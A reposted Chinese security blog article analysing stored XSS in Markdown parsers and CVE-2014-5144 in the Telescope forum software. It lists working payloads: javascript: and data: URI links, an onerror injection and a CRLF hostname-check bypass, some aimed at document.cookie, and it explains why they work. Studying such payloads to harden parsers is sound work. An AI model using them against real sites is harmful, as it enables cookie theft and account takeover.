转载

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

FreeBuf科普:什么是Markdown?

Markdown是一种轻量级的标记语言,流行程度已经得到了GitHub和Stack Overflow的广泛支持,作为普通人我们也可以轻松上手。

用markdown来写文章非常赞,那些琐碎的HTML标签都可以抛到脑后不用管。最近5年内,markdown收到非常多的关注,包括Reddit,Github,StackOverflow在内的很多应用都使用 markdown这也催生了很多的markdown解析器的产生, 这里 定义了一些markdown语法,语法约定markdown解析器将这些标签解析为html标签。

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

Markdown安全现状

Markdow解析器的安全现状如何?有没有对用户输入的数据做过滤?

事实上,很多markdown解析器都没有过滤用户输入的数据,那么如果markdown被用于添加用户评论等功能的时候,就有可能存在安全风险。

这里有一些关于这个问题的讨论: [1] , [2] , [3] .

另外,如果用googe搜索一下:

markdown xss issue site:github.com

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

你就会发现github上又很多星级很高的项目都被发现存在XSS 漏洞。

所以,如何构造一些payload呢?看下面这些:

[a](javascript:prompt(document.cookie)) [a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie)) ![a](javascript:prompt(document.cookie))/ <javascript:prompt(document.cookie)>  <javascript:alert('XSS')>   ![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)/ [a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K) [a](javascript:alert('XSS')) ![a'"`onerror=prompt(document.cookie)](x)/ [citelol]: (javascript:prompt(document.cookie)) [notmalicious](javascript:window.onerror=alert;throw%20document.cookie) [test](javascript://%0d%0aprompt(1)) [test](javascript://%0d%0aprompt(1);com)

上面这些payload是由 Aleksa 和原文作者一起搞出来的。在过去的12个月内,在实际渗透测试中证明,上面的这些 payload 是有效的。并且很多 markdown 解析器都受到影响。来看一下最后一个payload: 

[test](javascript://%0d%0aprompt(1);com)

我们猜测,markdown 解析器可能通过如下几个步骤来进行解析&转换:

  1. 判断时候有协议头?//有javascript 伪协议,Y

  2. hostname 是以常见的域名后缀(com, org)结尾的?//是的,以 com 结尾 Y

  3. 将上述 payload 转换为 HTML 标签,//结果如下

<a href="javascript://%0d%0aprompt(1);com>test</a>

成功构造了一个XSS payload!当点击了上述链接后,就会触发XSS!

Telescope解析器一个持久性 XSS 漏洞(CVE-2014-5144)

Telescope 是一个有名的开源项目,类似Reddit和Hackernews一样,提供一个社区功能。Telescope的一个解析帖子&评论的功能存在 XSS 漏洞,并且这个功能存在很久了!

在0.9.3之前的版本中,以上面的 payload 列表中的 payload 发帖或者发表评论,就可以导致一个XSS漏洞。该漏洞已经修复,Telescope在这里发了changelog:http://www.telesc.pe/blog/telescope-v093-dailyscope/

下面是漏洞对应的payload:

[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

漏洞分析:一个Markdown解析器的持久型XSS漏洞(CVE-2014-5144)

正文到此结束
所属分类: 编程技术

热门推荐

相关文章

阿里云首购8折
说给你听

本文目录
随机标签
书籍教程
springboot-demo Java入门教程 bootstrap3 CSS Apache基础教程 php ionic 教程 Python mysql教程 eclipse Ubuntu VPS系统配置 AngularJS 教程 MongoDB教程 Struts2教程 Redis教程 Spring教程 Git教程 Jenkins进阶系列 openfire参考指南 Java设计模式 HBase教程 Maven教程 hibernate教程 Docker 教程 memcached教程 Quartz指南 Hive教程 Ant教程 ANTLR教程 SpringCloud java实例教程 springcloud-demo XStream教程 Hazelcast教程 Elastic-Job-Lite 深入浅出MyBatis SVN教程 ibaties教程 rabittmq教程 solr教程 Hadoop教程 WebService CXF学习 JPA教程 ActiveMQ中文指南 java-demo Java内存模型 dubbo教程 python3-demo Linux入门视频教程
近期评论
  1. 1 Spring Cloud Consul实现选举机制
  2. 2 Spring Boot集成ShedLock实现分布式定时任务
  3. 3 利用oss进行数据库和网站图片备份
  4. 4 Spring Cloud Stream实现数据流处理
  5. 5 Python3访问MySQL数据库快速入门Demo
  6. 6 Github开源项目作者可以免费申请 JetBrains 全家桶
  7. 7 Spring Cloud Vault快速入门Demo
  8. 8 Spring Cloud Gateway快速入门Demo
  9. 9 Spring Cloud Contract快速入门Demo
  10. 10 Spring Cloud Consul快速入门Demo
网站信息
  • 文章总数:82,714 篇
  • 文件总数:284,287 个
  • 标签总数:2,393 个
  • 分类总数:85 个
  • 留言数量:2,560 条
  • 在线人数:605 人
  • 运行天数:4,409天
  • 最后更新:2024年11月22日01点
Loading...

其他链接

关于本站

本站定位:个人技术类博客

本站作用:写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

[HBLOG]公众号 HBLOG HBLOG